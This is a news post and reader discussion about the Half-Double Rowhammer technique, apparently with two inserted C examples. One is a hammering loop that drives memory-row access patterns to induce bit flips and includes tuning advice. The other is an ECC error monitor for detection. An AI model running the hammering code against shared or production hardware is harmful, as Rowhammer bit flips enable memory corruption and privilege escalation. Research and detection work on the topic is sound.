
posted by martyb on Wednesday May 26 2021, @05:42AM
from the if-i-had-a-(row)-hammer dept.

Introducing Half-Double: New hammering technique for DRAM Rowhammer bug:

Today, we are sharing details around our discovery of Half-Double, a new Rowhammer technique that capitalizes on the worsening physics of some of the newer DRAM chips to alter the contents of memory.

[...] As DDR4 became widely adopted, it appeared as though Rowhammer had faded away thanks in part to these built-in defense mechanisms. However, in 2020, the TRRespass paper showed how to reverse-engineer and neutralize the defense by distributing accesses, demonstrating that Rowhammer techniques are still viable. Earlier this year, the SMASH research went one step further and demonstrated exploitation from JavaScript, without invoking cache-management primitives or system calls.

Traditionally, Rowhammer was understood to operate at a distance of one row: when a DRAM row is accessed repeatedly (the "aggressor"), bit flips were found only in the two adjacent rows (the "victims"). However, with Half-Double, we have observed Rowhammer effects propagating to rows beyond adjacent neighbors, albeit at a reduced strength. Given three consecutive rows A, B, and C, we were able to attack C by directing a very large number of accesses to A, along with just a handful (~dozens) to B. Based on our experiments, accesses to B have a non-linear gating effect, in which they appear to "transport" the Rowhammer effect of A onto C. Unlike TRRespass, which exploits the blind spots of manufacturer-dependent defenses, Half-Double is an intrinsic property of the underlying silicon substrate. This is likely an indication that the electrical coupling responsible for Rowhammer is a property of distance, effectively becoming stronger and longer-ranged as cell geometries shrink down. Distances greater than two are conceivable.
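The access pattern the summary describes, written out as a user-space hammering loop. This is an added example, not code from the original post or from the Google researchers. It assumes a buffer in which the three rows A, B and C are ROW_STRIDE bytes apart (a hypothetical mapping; real row adjacency has to be reverse-engineered from the memory controller's address mapping, or obtained from physically contiguous memory such as a huge page), uses clflush on x86 so that every read is a fresh DRAM activation rather than a cache hit, and checks the victim row C against a known fill pattern afterwards. On a healthy test host a short run is expected to report zero flips; the value of the block is the shape of the loop and the victim check, not a demonstration of corruption.

```c
/* Added example: the Half-Double access pattern from the summary above,
   written as a user-space hammering loop. Not code from the original post
   or from the Google researchers. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if defined(__x86_64__) || defined(__i386__)
#include <emmintrin.h>                      /* _mm_clflush */
#define FLUSH(p) _mm_clflush((const void *)(p))
#else
/* No portable cache-line flush: reads may be served from cache and never reach DRAM. */
#define FLUSH(p) ((void)(p))
#endif

/* ASSUMPTION: rows A, B, C sit ROW_STRIDE bytes apart in this buffer. Real row
   adjacency depends on the memory controller's address mapping and on which
   physical pages the allocator hands out; it must be reverse-engineered (or a
   huge page used) before this pattern means anything on real hardware. */
#define ROW_STRIDE (8u * 1024u)
#define NUM_ROWS   4u
enum { ROW_A = 0, ROW_B = 1, ROW_C = 2 };   /* A: far aggressor, B: near aggressor, C: victim */

static unsigned popcount8(uint8_t x) {
    unsigned n = 0;
    while (x) { n += x & 1u; x >>= 1; }
    return n;
}

/* Write a known pattern into a row so later flips can be detected. */
static void fill_row(uint8_t *buf, unsigned row, uint8_t pattern) {
    memset(buf + (size_t)row * ROW_STRIDE, pattern, ROW_STRIDE);
}

/* Count bits in `row` that no longer match `pattern`. */
static unsigned count_flips(const uint8_t *buf, unsigned row, uint8_t pattern) {
    const uint8_t *r = buf + (size_t)row * ROW_STRIDE;
    unsigned flips = 0;
    size_t i;
    for (i = 0; i < ROW_STRIDE; i++) flips += popcount8((uint8_t)(r[i] ^ pattern));
    return flips;
}

/* One Half-Double round: `heavy` reads of row A with exactly `light` reads of
   row B spread evenly among them. Each read is followed by a cache-line flush so
   the next read is a DRAM activation, not a cache hit. Returns the number of
   reads issued so the caller can confirm the A:B ratio it asked for. */
static unsigned long half_double_round(volatile uint8_t *buf, unsigned long heavy, unsigned long light) {
    volatile uint8_t *a = buf + (size_t)ROW_A * ROW_STRIDE;
    volatile uint8_t *b = buf + (size_t)ROW_B * ROW_STRIDE;
    unsigned long b_every = light ? (heavy / light ? heavy / light : 1) : 0;
    unsigned long issued = 0, b_done = 0, i;
    for (i = 0; i < heavy; i++) {
        (void)*a; FLUSH(a); issued++;
        if (b_every && b_done < light && i % b_every == 0) {
            (void)*b; FLUSH(b); issued++; b_done++;
        }
    }
    return issued;
}

int main(void) {
    const unsigned long heavy = 1000000UL, light = 50;  /* "very large" vs "a handful (~dozens)" */
    const unsigned rounds = 20;
    unsigned round, flips;
    uint8_t *buf = malloc((size_t)NUM_ROWS * ROW_STRIDE);
    if (!buf) return 1;
    memset(buf, 0, (size_t)NUM_ROWS * ROW_STRIDE);
    fill_row(buf, ROW_C, 0xFF);     /* repeat with 0x00: flip direction depends on the cell's orientation */
    for (round = 0; round < rounds; round++) half_double_round(buf, heavy, light);
    flips = count_flips(buf, ROW_C, 0xFF);
    printf("row C: %u bit flips after %u rounds of %lu:%lu A:B reads\n", flips, rounds, heavy, light);
    free(buf);
    return flips ? 3 : 0;
}
```

The ratio is the whole point: a conventional single-sided hammer would issue only the row A reads, and the few row B reads are what the summary describes as "transporting" the effect of A onto C. Keep the B count in the dozens rather than the thousands, otherwise B itself becomes an ordinary adjacent aggressor and the experiment no longer isolates the distance-two effect.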


  • (Score: 2, Interesting) by Mojibake Tengu on Wednesday May 26 2021, @07:40AM (2 children)

    by Mojibake Tengu (8598) on Wednesday May 26 2021, @07:40AM (#1138862) Journal

    Late chronically bad and wrong design of hardware is a symptom of both cultural and knowledge decadence at large.

    If you continue to push optimization of economics for money income, and keep ignoring fundamental qualities of technological constructs, in the end you will get a society with piles of money somewhere but no usable technology at all anywhere. Worse, before that convergent limit happens, you can't even predict the synergy of many wrong designs leading to collapse of particular structures in technology constructs depending on those wrong designs.

    Those who'll realize this in time and manage to evade such madness will pwn the planet for themselves.

    --
    The edge of 太玄 cannot be defined, for it is beyond every aspect of design
    • (Score: 0) by Anonymous Coward on Wednesday May 26 2021, @07:52AM (1 child)

      by Anonymous Coward on Wednesday May 26 2021, @07:52AM (#1138865)

      I suggest publishing your thoughts in the "Quantum Mechanical Journal of Societal Transformation".

      • (Score: 1, Funny) by Anonymous Coward on Thursday May 27 2021, @01:26AM

        by Anonymous Coward on Thursday May 27 2021, @01:26AM (#1139143)

        Or Deep Thoughts with Jack Handey

  • (Score: 1) by shrewdsheep on Wednesday May 26 2021, @07:59AM (2 children)

    by shrewdsheep (5215) on Wednesday May 26 2021, @07:59AM (#1138866)

    I am wondering whether encrypting or rather transforming memory could be a solution. If memory is encrypted (let's say per row) and the key is changed with every memory refresh, wouldn't that solve row-hammer? The "encryption" could be as simple as XOR-ing with a random key which could also be short. Maybe, even a single bit would be enough, indicating whether memory is stored plain or bit-flipped.

    • (Score: 1, Informative) by Anonymous Coward on Wednesday May 26 2021, @08:22AM (1 child)

      by Anonymous Coward on Wednesday May 26 2021, @08:22AM (#1138869)

      ECC memory is a better solution. It both detects the attack in a way you could act on and corrects the errors (ex: your OS could notice that you have high RAM error rates and take action before you get uncorrected errors, possibly including throttling the process causing the issue and/or reporting the attempted attack to the user)

      You can blame Intel's market segmentation efforts for causing ECC to basically not exist in the consumer space.

      Memory encryption could help as well (and there is tech to do that in some modern CPUs)

      • (Score: 0) by Anonymous Coward on Wednesday May 26 2021, @10:33AM

        by Anonymous Coward on Wednesday May 26 2021, @10:33AM (#1138880)

        If you look at the papers, ECC is not foolproof either. There are mitigations for rowhammer-type attacks that do work, and some are even in later versions of the JEDEC specs. The problem, as TRRespass showed, is that manufacturers would rather not follow them to maintain their speed advantage, however slight it is on synthetic benchmarks.
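The OS-side reaction the two comments above discuss, as an added example (not code from the page or from any commenter): a small Linux poller over the EDAC correctable-error counter that flags a burst of corrections, which is what a Rowhammer attempt against ECC memory looks like before an uncorrectable error lands. The sysfs path is the real one exposed by the Linux EDAC driver for memory controller 0; the threshold and poll interval are assumptions chosen for illustration. As the reply notes, ECC is not foolproof, so treat this as a detector, not a fix.

```c
/* Added example: poll the Linux EDAC corrected-error counter and alert on a burst.
   Not code from the original page or from any commenter. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Real Linux sysfs path (EDAC driver loaded, memory controller 0). */
#define EDAC_CE_PATH "/sys/devices/system/edac/mc/mc0/ce_count"

/* ASSUMPTION: tuning knobs, not a standard. Healthy ECC DIMMs log close to zero
   corrected errors per hour, so even a few per minute is worth a look. */
#define CE_PER_MINUTE_THRESHOLD 10.0
#define POLL_SECONDS 10

/* Parse the decimal text sysfs returns ("17\n"); -1 on anything else. */
static long parse_counter(const char *text) {
    char *end;
    long v;
    errno = 0;
    v = strtol(text, &end, 10);
    if (end == text || errno != 0 || v < 0) return -1;
    while (*end == '\n' || *end == ' ') end++;
    return *end == '\0' ? v : -1;
}

/* Read one counter file; -1 if EDAC is absent (no ECC DIMMs or driver not loaded). */
static long read_counter(const char *path) {
    char buf[32];
    size_t n;
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return parse_counter(buf);
}

/* Compare two samples taken `seconds` apart.
   1 = burst above threshold, 0 = normal, -1 = unusable (missing or reset counter). */
static int ce_burst(long prev, long cur, unsigned seconds, double per_minute_threshold) {
    double rate;
    if (prev < 0 || cur < 0 || cur < prev || seconds == 0) return -1;
    rate = (double)(cur - prev) * 60.0 / (double)seconds;
    return rate > per_minute_threshold ? 1 : 0;
}

int main(void) {
    long prev = read_counter(EDAC_CE_PATH);
    if (prev < 0) {
        fprintf(stderr, "no EDAC counter at %s: ECC error reporting unavailable\n", EDAC_CE_PATH);
        return 2;
    }
    for (;;) {
        long cur;
        sleep(POLL_SECONDS);
        cur = read_counter(EDAC_CE_PATH);
        switch (ce_burst(prev, cur, POLL_SECONDS, CE_PER_MINUTE_THRESHOLD)) {
        case 1:
            printf("ALERT: %ld corrected errors in %us, possible Rowhammer activity\n", cur - prev, (unsigned)POLL_SECONDS);
            break;
        case -1:
            fprintf(stderr, "EDAC counter unreadable or reset\n");
            break;
        default:
            break;
        }
        prev = cur;
    }
}
```

A counter that is absent entirely is the other useful signal: on a consumer board without ECC DIMMs the path never exists, which is exactly the market-segmentation point made above. Per-DIMM counters live under the csrow and dimm subdirectories of the same mc0 directory if you want to localise the burst.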

  • (Score: 2) by bzipitidoo on Wednesday May 26 2021, @08:23AM (4 children)

    by bzipitidoo (4388) Subscriber Badge on Wednesday May 26 2021, @08:23AM (#1138870) Journal

    How about dealing with this by adding a new item on the hardware end of things, RAM that is slower, but much more secure? Wouldn't be all that different from all the caching that is done now. And we've already wandered down the path of specialized memory, with, for instance, GDDR RAM for graphics.

    This "secure RAM" (SSDR, for Secure Single Data Rate?) would zero itself when freed (and have means of tracking whether it is allocated or not), as well as not suffer from Rowhammer. Because, let's face it, most activity simply doesn't need any security from Rowhammer, it's only the handling of passwords and such like sensitive data that needs to be done securely. 16 megabytes should be way more than enough RAM to handle a few passwords and a login utility.

    • (Score: 1, Interesting) by Anonymous Coward on Wednesday May 26 2021, @09:02AM (3 children)

      by Anonymous Coward on Wednesday May 26 2021, @09:02AM (#1138877)

      Some years ago my system started getting less stable, every few months it would blue screen. Being a cheapskate instead of buying new hardware I reduced the RAM refresh interval and no unexpected blue screens since. But apparently slight reductions aren't enough to protect against row hammer (needs to be 1/7th) see page 26: http://users.ece.cmu.edu/~omutlu/pub/dram-row-hammer_kim_talk_isca14.pdf

      I think my chosen interval reduction only reduces the row hammer error rate by a factor of about a thousand. In practice my DRAM is probably older and "weaker" so go figure...

      ECC is helpful but in theory there are ECC attacks too. That said, I doubt attempts to flip bits would be perfect the first time round. So if your system alerts you to ECC issues then you should notice row hammer attacks. Whether you notice them in time is another issue.

      I suspect a combination of ECC and refresh interval reduction should make things much harder for the attacker.

      • (Score: 2) by RS3 on Wednesday May 26 2021, @05:05PM (2 children)

        by RS3 (6367) on Wednesday May 26 2021, @05:05PM (#1139010)

        I'm curious what kind of system allows you to vary RAM refresh rate. Is that in BIOS/UEFI, or do you have a utility?

        Did you run memtest86?

        • (Score: 2, Informative) by jurov on Wednesday May 26 2021, @05:53PM (1 child)

          by jurov (6250) on Wednesday May 26 2021, @05:53PM (#1139032)

          Yes, on desktop mainboards it is usually possible to configure DRAM clock and timing, in BIOS setup.

          • (Score: 2) by RS3 on Friday June 04 2021, @08:08AM

            by RS3 (6367) on Friday June 04 2021, @08:08AM (#1141708)

            I'm not sure I'd say "usually". Aftermarket ones usually do, and that's part of their appeal, but OEMs like to lock most of that stuff down. Well, by "OEM" I mean major names like Dell, HP, Lenovo, etc. Alienware probably lets you tweak up a storm. Are you aware of any major label computers that let you make any significant changes to RAM timing, bus speeds, etc? Maybe there are more than I'm aware of...

  • (Score: 2) by FatPhil on Wednesday May 26 2021, @01:28PM

    by FatPhil (863) <{pc-soylent} {at} {asdf.fi}> on Wednesday May 26 2021, @01:28PM (#1138901) Homepage

    How about not running malware on your CPU in the first place?

    Were the kids not told to practice safe hex?
    --
    Great minds discuss ideas; average minds discuss events; small minds discuss people; the smallest discuss themselves
  • (Score: 0) by Anonymous Coward on Wednesday May 26 2021, @05:58PM (1 child)

    by Anonymous Coward on Wednesday May 26 2021, @05:58PM (#1139034)

    The only thing I know about this is from what I see on headlines. Is this just a memory corrupting thing, or is it an exploit where one can flip adjacent memory bits such that one could execute code? That's the part of the big picture that I don't understand.

    • (Score: 0) by Anonymous Coward on Thursday May 27 2021, @10:24AM

      by Anonymous Coward on Thursday May 27 2021, @10:24AM (#1139246)

      Right now, it is just theoretical because it is harder to implement. However, there were those who claimed the original Rowhammer was and would always be just theoretical. But now Rowhammer is a very real threat to the security of both the server space and the home user. Usually it gives privilege escalation but ACE is possible too.
